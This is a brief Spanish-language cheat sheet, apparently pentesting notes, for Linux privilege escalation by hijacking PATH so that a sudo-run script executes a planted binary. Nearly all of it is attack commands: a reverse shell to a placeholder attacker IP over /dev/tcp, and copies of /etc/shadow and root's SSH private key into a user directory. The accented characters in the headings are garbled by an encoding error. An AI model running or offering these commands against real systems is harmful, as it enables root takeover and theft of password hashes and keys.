Creaci贸n de directorio de trabajo.
Creaci贸n de binario que suplantar谩 el binario original y asignaci贸n de sus privilegios.
# opci贸n 1: shell
echo "/bin/bash" > <binary>
echo "/bin/bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<port> 0>&1'" > <binary>
# opci贸n 2: lectura de archivo
echo "/bin/bash -c 'cat /<path>/<file> > /home/<user>/temp/<file>'" > <binary>
echo "/bin/bash -c 'cat /etc/shadow > /home/<user>/temp/shadow'" > <binary>
echo "/bin/bash -c 'cat /root/.ssh/id_rsa > /home/<user>/temp/id_rsa'" > <binary>
# asignaci贸n de privilegios al binario
chmod 777 <binary>
Incorporaci贸n de ruta a variable PATH.
echo $PATH
export PATH=/home/<user>/temp:$PATH
echo $PATH
Ejecuci贸n de script o binario vulnerable.
sudo /<path>/<script>
sudo /<path>/<binary>